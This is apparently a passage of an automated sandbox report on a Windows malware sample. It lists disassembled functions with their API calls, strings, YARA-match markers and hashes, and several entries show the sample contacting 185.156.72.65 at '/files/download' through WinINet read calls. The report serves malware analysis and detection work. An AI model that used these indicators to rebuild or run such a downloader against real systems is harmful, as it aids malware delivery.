                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518D9
                      • Concurrency::cancel_current_task.LIBCPMT ref: 049519EE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: 185.156.72.65
                      • API String ID: 2123813255-1765470537
                      • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                      • Instruction ID: a7ed5558de41f27cae143ab3c72e322dddedd3e6f85bbaf2a4dca6a38d894550
                      • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                      • Instruction Fuzzy Hash: 1941D7B1E00301EBE724DF64AC86B5AB6F8EF44214F300639ED5AD72A0E771B944C7A1
                      Function 004105C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DE4EB787,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                      • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                      • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                      • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                      • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                      Function 00415050 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                      Download Yara Rule
                      APIs
                      • __alloca_probe_16.LIBCMT ref: 004150D5
                      • __alloca_probe_16.LIBCMT ref: 0041519E
                      • __freea.LIBCMT ref: 00415205
                        • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                      • __freea.LIBCMT ref: 00415218
                      • __freea.LIBCMT ref: 00415225
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                      • String ID:
                      • API String ID: 1423051803-0
                      • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                      • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                      • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                      • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                      Function 04952CB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 04952D5F
                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04952D74
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04952D82
                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04952D9D
                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04952DBC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                      • String ID:
                      • API String ID: 2509773233-0
                      • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                      • Instruction ID: ad75ccc773eceebc192db8fb39c2314cbaead7f3e8e0fd29d23a60f79af1df4f
                      • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                      • Instruction Fuzzy Hash: 9131E532B00104AFEB14DF58DC40FAAB7B8EF48700F6541F9ED059B2A2DB31A916CB94
                      Function 00401330 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004013BB
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                      • API String ID: 2296764815-3011832937
                      • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                      • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                      • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                      • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                      Function 04951597 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04951622
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                      • API String ID: 4132704954-3011832937
                      • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                      • Instruction ID: f2a4a027ef8a0ee0b3476cacc3b775bdd46468fee5a2291894e2f4cb192b192f
                      • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                      • Instruction Fuzzy Hash: 2F2146B0F00244DAE730DF29E8467A9B3A0FB55308FB48279DC455B271DBB52986CB09
                      Function 0040CAD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                      • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID: api-ms-
                      • API String ID: 3177248105-2084034818
                      • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                      • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                      • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                      • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                      Function 004196CC Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetConsoleOutputCP.KERNEL32(DE4EB787,00000000,00000000,00000000), ref: 0041972F
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                      • GetLastError.KERNEL32 ref: 00419A6A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                      • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                      • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                      • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                      Function 04969933 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04969996
                        • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04969BE8
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04969C2E
                      • GetLastError.KERNEL32 ref: 04969CD1
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                      • Instruction ID: 090ace3839b3da5c97d2318d0a6ade9401a9e7bae4a9c71c157b85b3dba30f2d
                      • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                      • Instruction Fuzzy Hash: F3D16BB5E002489FCF15CFE8D8809ADBBF9FF49314F28456AE45AEB351D630A946CB50
                      Function 04951BD7 Relevance: 6.3, APIs: 4, Instructions: 293networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04951C6C
                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04951C8F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileInternet$PointerRead
                      • String ID:
                      • API String ID: 3197321146-0
                      • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                      • Instruction ID: eb7b93129c0bd39a399fa667d664963be0dca8c4f381e32a02064f17c29549db
                      • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                      • Instruction Fuzzy Hash: E2C14B70900218DFEB24DF64CC85BE9B7B9EF49304F2041E9E909A72A0D775BA84CF95
                      Function 0040BAA4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                      • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                      Function 0495BD0B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction ID: 5cc4e608ba870c86061b251413a45c7d5df544701d674f89a2be05a2e5113e03
                      • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction Fuzzy Hash: AE51A2B2601606AFEB29DF14D889BBA77A9EF40314F38453DDE054B6B0E731B954CB90
                      Function 004174E4 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • GetLastError.KERNEL32 ref: 00417548
                      • __dosmaperr.LIBCMT ref: 0041754F
                      • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                      • __dosmaperr.LIBCMT ref: 00417590
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                      • String ID:
                      • API String ID: 1913693674-0
                      • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                      • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                      Function 0496774B Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                      • GetLastError.KERNEL32 ref: 049677AF
                      • __dosmaperr.LIBCMT ref: 049677B6
                      • GetLastError.KERNEL32(?,?,?,?), ref: 049677F0
                      • __dosmaperr.LIBCMT ref: 049677F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                      • String ID:
                      • API String ID: 1913693674-0
                      • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction ID: 89fbce9ef6911b3f7a181470303265efeba8fc05d8566701dc68da8c1070cfd8
                      • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction Fuzzy Hash: 1E216271600605AFEB11EFA598C0C6BB7ADFF842AC7108579E91B97250E735FC50CBA0
                      Function 0041121B Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                      Function 04961482 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction ID: df6395ff5d616979d49be4c64c05c387649a92e6d41db2ca51b23fd16f764d07
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: E6218E71204205AFAB20EF659C8197AB7AEEF842A87108935F91BDB160E730FC4087A0
                      Function 00418485 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                      Function 049635E0 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,049636EF,0495381E,?,00000000,04952AA0,04952AA2,?,04963868,00000022,00420B0C,00422950,00422958,04952AA0), ref: 049636A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction ID: 067c916b0eb0639cacaf8424bae5b75bf55862140bc37f4bcbf575502e0cae7c
                      • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction Fuzzy Hash: 6B21D231B01610BBCB319F65EC42B9A3B6D9B427A4B254235ED07A73A1EB30FD05C6D4
                      Function 049686EC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 049686F4
                        • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496872C
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496874C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: feb1a02ec53880696c5514432aa90a6bf02a22c72f3534a569fecb4c0ca89810
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 0611C4B66125197E77217B765CC8CAF3DADCEC91A87010534F90792100FA60FE0282B6
                      Function 0041CC28 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                      • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                        • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                      • ___initconout.LIBCMT ref: 0041CC5B
                        • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                      Function 0496CE8F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000), ref: 0496CEA6
                      • GetLastError.KERNEL32(?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000,?,0496A2C8,?), ref: 0496CEB2
                        • Part of subcall function 0496CE78: CloseHandle.KERNEL32(0042CA30,0496CEC2,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000), ref: 0496CE88
                      • ___initconout.LIBCMT ref: 0496CEC2
                        • Part of subcall function 0496CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0496CE69,0496CAF3,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CE4D
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CED7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 525149c5109c89400660402c7a5a91214a4283679d32bd0e85d18a4c906a30fe
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: 18F0AC36540158BBCF225F95EC08A9A7F36FF496A1B458030FA5A96120D732AC219BD4
                      Function 00409D4D Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                      Download Yara Rule
                      APIs
                      • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                      • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                      • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                      • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                      • String ID:
                      • API String ID: 3269011525-0
                      • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
